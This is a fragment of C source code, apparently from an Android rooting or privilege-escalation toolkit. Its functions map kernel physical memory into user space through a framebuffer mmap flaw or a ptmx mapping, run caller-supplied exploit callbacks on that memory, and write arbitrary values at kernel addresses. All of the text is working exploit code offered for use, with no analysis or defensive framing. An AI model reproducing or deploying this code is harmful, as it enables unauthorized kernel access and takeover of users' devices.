bool map_kernel_memory(void) { if (!kernel_physical_offset) { if (!setup_variables()) { return false; } } fb_mmap_fd = -1; kernel_mapped_address = PTMX_MEMORY_MAPPED_ADDRESS; if (ptmx_map_memory(PTMX_MEMORY_MAPPED_ADDRESS, kernel_physical_offset, KERNEL_MEMORY_SIZE)) { return true; } fb_mem_set_kernel_phys_offset(kernel_physical_offset - 0x8000); printf("Attempt fb_mem_exploit...\n"); fb_mem_mmap_base = fb_mem_mmap(&fb_mmap_fd); if (fb_mem_mmap_base) { kernel_mapped_address = (unsigned long int)fb_mem_convert_to_mmaped_address((void *)KERNEL_BASE_ADDRESS, fb_mem_mmap_base); return true; } fb_mmap_fd = -1; return false; }
static bool attempt_mmap_fb_mem_exploit(exploit_memory_callback_t callback_func, void *callback_param) { unsigned long int offset; int fd; void *address; bool result; offset = get_kernel_physical_offset(); if (offset) { fb_mem_set_kernel_phys_offset(offset - 0x00008000); } address = fb_mem_mmap(&fd); if (address == MAP_FAILED) { return false; } result = callback_func(fb_mem_convert_to_mmaped_address((void *)PAGE_OFFSET, address), KERNEL_SIZE, callback_param); fb_mem_munmap(address, fd); return result; }
bool fb_mem_run_exploit(bool(*exploit_callback)(void *mmap_base_address, void *user_data), void *user_data) { void *mapped_address = NULL; int fd; bool success; mapped_address = fb_mem_mmap(&fd); if (mapped_address == MAP_FAILED) { return false; } success = exploit_callback(mapped_address, user_data); fb_mem_munmap(mapped_address, fd); return success; }
bool fb_mem_write_value_at_address(unsigned long int address, int value) { void *mmap_address = NULL; int *write_address; int fd; mmap_address = fb_mem_mmap(&fd); if (mmap_address == MAP_FAILED) { return false; } write_address = (int*)fb_mem_convert_to_mmaped_address((void*)address, mmap_address); *write_address = value; fb_mem_munmap(mmap_address, fd); return true; }